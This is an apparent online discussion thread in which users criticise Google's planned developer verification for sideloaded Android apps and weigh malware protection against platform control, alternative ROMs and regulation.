I could use a knife to chop meat, not people; I could use a car to commute, not as a high speed bullet; I could use a gun to eliminate pests, not to kill people. Just because I can use something to do something nefarious doesn't mean it should be banned, of we should not use Internet at all because it facilitates scammers.
It is always the human mind that dictates the action, not the tool. It is futile to try and ban the tool, and I bet 100% they knew that.
This is uncanny and worryingly specific, and I'm not a lawyer, but if you're not already under suspicion of being a criminal, then installing graphene doesn't match this definition I think
"This regulation will only apply to people who are already criminals" is a line that has never held
Suspect, they wrote, and that happens all the time. If you go into a store on the way home from work, and 99 days this works fine but the 100th day they want to look in your bag, but you can't show them confidential drawings of the Google Pixel 14 Max that you carry as part of your work, now they'll think you really did steal something and you went from no suspicion (spot check) to definitely a suspect and new things start to apply to you, e.g. if you leave without resolving the suspicion the police might have grounds to enter your house or search you when you walk out next time. The suspicion is based on being a suspect, not on any actual evidence (nobody saw you put anything in your bag)
I mean, you don't really have to speculate about what this is for, it's for an authority providing for lawful search, it seems pretty well-scoped, and similar to any old search warrant, which is not a new thing, really https://classic.austlii.edu.au/au/legis/nsw/consol_act/deccd...
Basically, they're not really setting up for a blanket ban on personal security features, that interpretation is obviously catastrophizing. Not that there aren't hamfisted laws somewhere like this, but NSWs implementation seems OK I guess
We have mass surveillance already in all 5 eyes countries that assumes that anyone can be a criminal at all times.
Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all. They understand that as well.
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
> there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
That's funny because I don't presume anything on the Windows store has integrity and feel safer downloading the MSI from the official source.
this is literally just an xbox lol
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
Was it? WOW64 runs 32-bit software fine enough. Or are you talking about 16-bit applications?
MS is now competing against businesses that see their users as profit centers. (Google, Meta, Apple)
Windows was never going to go another way than this.
Users who care about hardware and/or software freedom should be on linux.
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
Microsoft basically already has this (and has for the last ~20 years) as SmartScreen.
When was the last time you opened your start menu?
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
Granny can get scammed using Anydesk, available on Google Play.
Imagine that metaphorical granny that in an instant catches fire and turns into ash if the governments and large corporations don't have complete control over our lives.
What a lovely granny that totally exists.
I suspect it's not grandma getting scammed by APKs, but people installing cracked versions of spotify/youtube/paid games.
> cracked versions of spotify/youtube/paid games
This doesn't make much sense to me.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
They mean apps like SmartTube, Vanced, Instander, Spotify Premium Mod which block ads or grant other premium features for free.
You are approaching as is the malicious developer was trying to add useful features for the users.
But in practice, these “apps that lookalike popular apps” are not intended to just be adware-less versions of the popular apps. They are frequently “hide the ads, inject the malware with more permissions” Trojan horses.
I think there is likely a dual motive from Google where they both want to stop malware _and_ stop people blocking youtube ads. The malware problem is real though.
no, cracked as in the ad-free premium versions, without paying for them
Those "cracked" versions often require extra permissions.
My favorite was a local "discover which on your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
My mother in law is constantly worried by some Google Ads in random apps that her phone is hacked...
Did she ever get anything side loaded like that? I have downloaded malware by mistake before. Not once were they allowed to proceed with installation. The only way I got anything side loaded was if I installed the first one (which is always Fdroid) deliberately via ADB after I enabled the developer mode.
This is the year of Linux on the Desktop!
I think the first thing Windows loses dominance in is Gaming, and that will be the beginning of the end.
Are there still people who like using Windows?
> Are there still people who like using Windows?
You are assuming that everyone knows about or ever experienced the alternatives. Windows way is the only way for many.
Linux is at 5% desktop market share this year, and I gave up on running windows games without steam a decade ago.
On average my game library works much better under Linux than Windows (Mac is a distant third — probably worse than FreeBSD).
Anyway, at 1 in 20, most people probably know someone that runs Linux.
No I'm not. I asked if anyone likes Windows. These people presumably have no opinion, it's just a means to an end. The closest thing I think you'll get is "I liked Windows 7" or something like that.
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
“western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care”
Wow, how fix (WITHOUT intelligence tests as voting requirement) :(
> This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation. I would say it’s really 50% platform control, 50% government regulation.
Malware is the excuse. I went, without super skill, 40 years while only contracting two viruses ever (one was Kakworm, the other was inert at the time because I was an Amiga user who kept a copy of Scorched Earth on a floppy, which never infected my Amiga).
This would also mean eliminating WSL2.
> I predict Windows will end up going this route before Google backtracks on it.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerably driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
I just want to say:
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
> I hope the DOJ/FTC split Google into a dozen companies.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
It is so weird to read comments based on a belief that the current government is aimed at some goal of justice. I guess they're just still drinking the Kool-aid?
Trump was a breath of fresh air talking about frustrations with the status quo that other politicians wouldn't acknowledge. But the only reason he was bringing them up was for use as a cudgel to shake down companies to enrich himself. He will very most certainly go after big tech monopolies and break them up... iff those big tech monopolies don't put bribes into his pocket. As long as his pockets get fatter, then the status quo is just peachy. It's called "making a deal".
control=surveillance
control is the entire point of the surveillance
This whole thing is getting totally out of surveillance!
Someone should hit surveillance-alt-delete!
government unregulation
It's still government regulation. It's just that they have changed the target or regulation from commercial entities to regular individuals like you.
What was the last time there were some actually good news in big tech? For those that don't hold stocks I mean.
> What was the last time there were some actually good news in big tech?
The issue is that the good news are often incremental, while the bad news come in large steps, which makes them much more noticeable.
Last week. The bags I’m holding for Intel got a little lighter. Lmao.
Nana is still not happy
We're in the era of less control, more surveillance, more "security", more being treated like a child and lied to.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
"Just yesterday, an app that directly impacts my money, asked me to make it more secure" - how did you survive?
Vemno doesn't get your bio data, it just gets a true or false from the OS.
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
For what it's worth, Venmo will not get access to your biometrics data, it's a black box in which you specify a desired level of authentication and the OS just returns ok/not ok.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
So people from countries US has sanctioned can't even develop and use mobile apps anymore. This will change millions of innocent lives. So unfair and racist. The reason my people are in this mess in the first place is a US coup.
Agreed!
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
> developers will have the same freedom to distribute their apps directly to users
You have here Google making a statement it can't actually fulfill and one that it knows it can't fulfill. So Google is willfully lying here.
The minute Google has a technical capability to control what applications run on Android it's out of their hands. It is in the hands of courts, governments, dictators and authoritarians. That's just the nature of the world - Google has to obey the law and Google doesn't make the laws.
I guess it sounds hysterical, but in that sense, this is an absolutely massive loss of freedom for the entire planet as communication power that rested with individual choice is now transferred wholesale back to governments by this decision.
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
If you are having random people try to attack you while you are at your home, you need to be prepared. Strengthen your door jambs with nine inch screws to replace the screws your door is mounted to and use metal plates to strengthen the locks (there are kits available at home improvement stores), install adherent plastic frosting on your windows that will slow down break ins by making the window much more annoying to break through, and install surveillence cameras outdoors. On the offensive front, you can consider OC/CS grenades you can throw down the hallway to avoid exposing yourself and handheld pepper spray for non-lethal deterrence at moderate range. Finally, if all else fails, keep a loaded handgun in a easy to use but hard for kids to unlock gun box under your drawer next to your bed. An under barrel flash light severely blinds invaders and makes them think twice about charging you, maximizing the chances that you nobody will get hurt. The door jamb upgrade is the most important one. I have returned home to a severely beaten door with my shattered iron door knocker on the ground laying in front of the door in pieces but the house was impenetrable to the burglar(s) who weren't willing to break through the glass. It also doesn't hurt to install fake $5 security dome cameras around the property.
Or just don't give your home address to Google.
Who doesn't like idea of throwing grenades down their hallway??
What do you mean by "Google posted my name and address"? How? Why?
If your app is monetized, the contact details of your "business" are shown in the play store. For many smaller developers, this will just be their home address.
https://support.google.com/googleplay/android-developer/thre...
That's absolutely correct.
That's why you have to have a business address, and get all your business admin ducks in a row, even if it's your first real monetized app. Your future self will always thank you!
I cannot resist the urge to point out that we wouldn't have had this problem if people actually sticked to free software instead of "commercial use friendly" open source licensing
You are 100% correct.
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
Sure, but just the regular GPLv3 would have been good enough to prevent this particular abuse.
That's fair, but a more pervasive Free Software ecosystem might have possibly avoided this outcome entirely. And that failure is something we can lay directly at the feet of the FSF.
If RMS was going to piss off the entire industry with a new version of the GPL, the least he could do was close the network hole. What we got instead is a half measure that satisfies nobody.
More importantly, he completely missed the boat on App Stores. Why was there never any watered down version of copyleft that could be used as a wedge to try and pry open app stores over time? They did it for libraries with the LGPL, but apparently app stores werent worth specials casing.
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
source: https://en.m.wikipedia.org/wiki/Toybox
Free choice in the market is a lie anyhow. You are limited by what is actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to to what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
Except Android is based on Linux.
This is crazy. I can't install my own apps on my own phone anymore.
I am gonna start carrying around a laptop with a 5G modem instead.
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all it's various apps that I trust to varying degrees.
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost a species.
I wonder if you could keep your "snitch" android phone home by instrumentalizing it, enabling you to access it remotely on your main linux/degoogled android phone. It might not even be that outrageous of an idea since there are tons of botfarms that are essentially stacks and stacks of legit phones being remotely controlled... the tech might be there already, just need to adapt if for something good...
https://github.com/Genymobile/scrcpy
How likely is it for google to deny access to all or most of the apis that makes this possible? Then you need to point a camera to the screen, mike the speakers and so on...
If you asked me yesterday if Google would ever block sideloading, I would have said no.
All bets are off at this point.
I'm curious why you need a phone for banking at all, at home as you say. Wouldn't a laptop suffice? Granted, not all banks have a web app these days
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
ding ding ding a second phone is the correct answer
Don't worry, they'll stop letting you access your bank without an app soon enough. Gotta protect the children and what-not.
I just got a letter from my bank stating this. Website is going away, app only access. It's very disappointing, for security I never have any banking access on my mobile devices
Time to switch banks.
That's indeed what I'm planning to do but I'll buy a Steam Deck
I have been looking into this as well. There are a few devices from GPD Win that are smaller than the Steam Deck but also have a physical keyboard.
I don't blame Goggle. Apple escaped anti-trust by simply not allowing anyone except themselves to put software on iPhones. Seriously, Apple doesn't allow competitors so it can't be anti-competitive according to the case.
Totally brain damaged ruling, the judge must have been molested by an Android phone at some point, but here we are, and google is now moving closer to an Apple model.
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The users gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
> we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to link someone to the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
There has to be a threshold where enshittification has been pushed so far that nerd software becomes the thing cool kids boast about running.
Where a less restricted device can do cool things nobody else can do.
A linux-based phone... with an 18650 battery slot... with a keyboard... and a meshtastic radio... drool.
Phones are hard because of certification requirements.
PDAs, now... have a look at https://www.clockworkpi.com/home-uconsole
There's an Android app called GPSLogger.[1] It does exactly what it says on the tin. Runners use it to track their own progress. Photographers use it to geotag their own photos.
The thing is, GPS access as a permission is a bit scary. You could imagine some dubious uses for it. Moreover, you could imagine some such dubious uses creating a public relations nightmare for Google. So, Google just forces them out of the Play Store. (Technically, it's a routine renewal, but the GPS permission causes them extra scrutiny, to the point where the author burned out and gave up.[2])
Do we expect that this author should, or for that matter will, give their identity to Google after this? Or is GPSLogger just dead after this change lands?
[1]: https://gpslogger.app/ [2]: https://github.com/mendhak/gpslogger/issues/849
The attempts to roll out digital ID are similar to the perennial efforts to backdoor encryption. When one push fails, the proponents regroup and formulate a new approach. The recent successes with "age verification" have encouraged digital ID proponents. Expect further encroachments, scaremongering and trial balloons.
Natural incentives exist for tech majors to capture this space.
This is completely, absolutely and totally unacceptable.
My phone is my phone, not Google’s. They have absolutely no right to prevent me from running whatever software I wish on that phone.
This must not be allowed to stand.
You paid for the phone with the OS as a contributing factor (alongside the hardware) to the purchase no doubt, so the OS in itself must be compelling to you for some reason.
You didn't fund the development of the OS, contribute to it (presumably), you didn't market it or position it alongside your brand.
I'd agree with you if you said you have a right to run anything on the hardware under a different OS, but you have no god given right to run whatever you want on the OS.
Looking at what's been going on in the E.U. vs. the U.S., it seems pretty clear that one of the only things companies this big, with this much control over the markets fear is regulation.
Maybe people live in a country where adding new regulations is difficult at the moment. In that case, push at for it at the state or province level. Push for it wherever you can. Suddenly these companies have to figure out how to work around 50 different state level laws? Painful. Good. Make it hurt to be evil.
People need to come together and push for regulatory roadblocks to things like this at every level. I think that's part of how you keep control of your own property and stand up against it.
It's actually your telco's phone. They're the one that has the license to run the baseband computer and RF transceiver. The 'pad' computer device is sort of yours. But there's no legal way to have ownership of a cell phone unless you yourself bid for and get the RF spectrum and set up your network in a way that accomplishes the FCC coverage and timing requirements. Then run your own telco for your phone. Basically, impossible.
Smart phones try to limit and firewall the interface between the two but tight integration is required for energy efficiency. So a smart phone, or a cell phone, can never be yours. They aren't good choices for doing computing and this legal reality is becoming more and more obvious with time.
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
That's exactly the goal
A few years from now: After reviewing the usage of the approved sideloading feature, we discovered no more than 0.01% of users ever sideload an application. For security, sideloading is now disabled on all devices forever.
Is that after the top execs join the US Army? [0]
0: https://news.ycombinator.com/item?id=44330155
So what are our options (eg for EU citizens) for lobbying in terms of legislation or directly to Google to show disagreement with this?
It looks like many in this thread are against, but I don't see suggestions for action?
We need to lobby for choice at every stage. You must be able to choose which network, which phone, which OS, which app stores, which apps.
I'm wondering the same thing in the US. Aside from writing Google and complaining, and purchasing a phone with a different OS (GrapheneOS or PureOS, for example), I'm not sure what else to do.
The issue with that 2nd solution is, "purchasing a phone with GrapheneOS" only registers from Google's perspective as "we just sold an additional Pixel, so we're doing good right now"
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
"To combat malware and financial scams"
What a horrible, terrible, depressing bag of lies that the anti-humanists keep getting away with saying with a straight face.
I really need the more open Linux tablet and phone makers to hurry up.
In fact, they need you to survive.
You can buy a Linux phone today and make sure the vendors get their food on the table. Software is getting better. If you choose a phone with mainline kernel support (e.g. one that can run Mobian or PureOS), you can literally watch your OS improve month after month.
Alternatively, you can support the user-space ecosystem directly and fund the developers who make it happen. Donate to Sebastian Krzyszkowiak [0] and Guido Günther [1] if you can!
[0]: https://liberapay.com/dos
[1]: https://honk.sigxcpu.org/piki/donations
Looks like Google will also be limiting each developer's number of apps and installations unless you pay them $25. https://developer.android.com/developer-verification/guides/...
That's how it's always costed
Yes, it's the same price as a Google Play Console developer account, but this is for access to the new Android Developer Console.
Great news which hopefully will shape the buyer away from monopolies.
Everytime i read a news like this i loose more hope for our world to not end up a Cyberpunk Dystopia. Like what am i supposed to do. I am just one man. One vote, one guy who isnt even to good at coding.
This must be because of Epic's win in antitrust court.
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
How does this differ from Obtainium?
I wasn't aware of obtainium. Thank you. I was thinking of something more like Google Chrome mobile edition but for APKs. So more focus around the search interface.
Somehow I can run a webserver and anyone can browse it but if I make an app I need a DUNS number? What year is it?
Couldn't the CA system, for all its problems, suffice?
The further into this corporatized "vision" of technology we go, the more I relate the elves in LoTR who basically said "our time is over" and then just leave Middle Earth.
There is no turning back. Generations of developers will grow up thinking every form of communication and technology by virtue of existing needs a corporate groundskeeper. Government identification will be required for most things.
I don't really blame the companies, though. Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online. What makes it all the more sour is that the very idea that things could be different is eroding away, too.
>Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online
Imagine if people felt that way about electrical power distribution? Every single thing you ever plugged in required a license to be validated at the time you tried to use an outlet?
For me, it's obvious that better ways of doing things exist, but I'm weird, and possibly a crank.
The solution, in my opinion, is to do the same thing we do with power in the home... limit the damage that can be done by anything plugged in, only giving away a limited capability for power delivery in a given outlet.
The analogous way to do this in an operating system is to discard the idea of providing all of the computing resources available to every program you run, and limit it in some way. The "permissions flags" we've all come to dread, first with UAC in Microsoft Windows, and now on our phones, obviously suck, and won't work.
The way to do it on a desktop, is to allow the user to choose exactly which resources a program may use, at runtime, by dialog boxes similar to the ones they already use, but with the additional behavior that the operating system enforces their choices, instead of just praying a program operates as intended.
On a phone, I don't have as strong an intuition, but I'm sure it can be worked out, both in a friendly, and secure way that doesn't require full time checking with consent from our betters in the corporate overlord hierarchy.
We can have secure and user friendly compute, both in our desktops, and in all our devices.
It's starting to look like I may end up with two phones. One with Lineage and most of my apps, hopefully, and another one with Play Protect which hopefully will be just my bank app. Google has become way too powerful and is encroaching step by step on our freedom, it's terrible. Tt's been going on for a long time. It's the IT equivalant of authoritarianism!!
Yeah, I think I will do that strategy as well. I will probably put Graphene on my next phone, and if any apps don't work I will keep them on another phone.
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
The fact that people die with helmets on motorcycles should put an end to the argument that it's for our own good.
If you had to give away your privacy to use one and could only use helmets authorized by your motorcycle dealer you might have a point. We accept impositions on our freedom all the time when what we get in return is worth the sacrifice. If signed binaries actually delivered on their promise of keeping people safe there'd be a discussion that could be had on whether or not it'd be worthwhile, but since they don't actually protect people we'd be giving up our privacy for nothing.
What you said had absolutely nothing to do with your original illogical statement.
"the argument that it's for our own good." is their instance that we should accept this loss of our freedom to run the software we want because it protects us. It doesn't actually protect us though, so it isn't worth it and we shouldn't accept it.
My original statement had nothing to do with motorcycle helmets, but if using them required us to give up enough of our freedoms they could also become unacceptable for the level or protection they provide (or fail to provide) us.
Is the right-click -> Open workaround not a thing any more on macOS?
Open -> Click away the error message -> Settings -> Privacy & Security -> Open Anyways -> Open Anyways -> Authenticate -> app actually opens
There's a ctrl+open shortcut, if I remember correctly, which may be what the parent comment is referring to.
Nope, they've been making it steadily more difficult with each release. The control open shortcut no longer works.
Nope, it has been removed. Also God help you if want to run something that needs system extensions..
You will need to boot to recovery mode, go through utility and enable it: https://support.apple.com/en-ca/guide/mac-help/mchl768f7291/...
Basically average users will never be able to pull this off.
As of macOS 15 (I think?), that shortcut stopped working, it will just show the same unverified software warning.
It requires a trip to a submenu in the Settings app now. You can’t do it simply or easily.
Microsoft does the same exact thing with SmartScreen, except that it has a whitelist for popular binaries.
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
Great for you. What about the normies ? You know the people that protest and make things change, how they are going to organize themselves when their government gets authoritarian and apple/google obeys to governments request to forbid some app. You know like what happened during Hong Kong protest with Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
It's not "all fine", but realistically it's the best that you can hope to achieve.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
> require your device to be running an official rom signed by Google
How exactly does the app detect this?
>At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
Next time you buy a phone, buy a supported model. Right?
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google ( and support the decision they just made with cash money ) or.. what exactly. I am not a Apple fan either.
So where do we complain? (Aside from shaming Google on social media or writing to politicians.)
If I look through Google's contact links, it's all oriented around getting help with a problem rather than letting them know I'm going to move to something else if they go through with this. (And yes, even if Apple has the same types of restrictions on app store, if a more open alternative OS didn't work out for me, I'd move to them to punish the one dropping freedom of use.)
So for our non public company apps I will now have to verify? What.
Sideloading is the only reason I'm on Android. When it goes away, I will be better with an Apple device.
I knew this was coming thanks to the nincompoops bankers and IMDA together with horny uncles who fall for love/job scams here in Singapore. The reason I use android over iOS is that I can load apps for personal automation. I think the current scenario where bank apps refuse to run on phones with sideloaded apps is far more acceptable. Im not sure scammers will not find a way around this. I can still be able pin web apps.
FWIW I'd rather not use my phone for critical transactions its making authorities lazy. The number of times Ive had to fight thanks to "buggy" payment code that deducts money is not funny and banks are getting worse at customer support day by day.
Also what the fuck are the governments doing with tax payer money, instead of going after criminals, we go after citizens.
If you think about it, the only thing that keeps this OS vendor in this duopolistic position is the fact that people rely on a certain proprietary apps. We need ways to do things like messaging and banking in a universal way, just like we can do with email, calls, texts and web. Banking and messaging should be fully universal so we don't rely on specific apps only available on specific app stores. That would take all power away from this satanic US companies!!!
This is dangerous, they are trying to prevent people from creating apps that don't support their narrative.
What would happen to projects like F-Droid, Termux, etc.?
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
[1] https://news.ycombinator.com/item?id=41895718
Guess whether the makers of alternative YouTube clients will want to tell Google, "Hey, this is a copy of our ID card our address"...
The only silver lining I see is if it allows you to bypass this by enabling dev mode on your phone. If you can't sideload unverified apps even in dev mode, that would be insanely bad.
IF that is the case, I'm actually willing to be slightly inclined to see this as a positive? We should normalize installing apps outside of Google Play, but that means malware becomes a serious issue with people downloading and installing random APKs.
e.g., this may normalize people hosting downloadable APKs whilst also reducing malware risk for "normies", which idealistically could weaken the "monopoly" of Google Play on android.
The problem is that Google is the gatekeeper.
Hopefully this increases the communal pressure to find a real alternative to android.
I'd wager there will be a buried setting to manually enable specific apps along with a warning. Like how macOS does it now by blocking unsigned apps.
It's only a question of time till DMCA takedowns will be abused to being down every app which remotely competes with any business model.
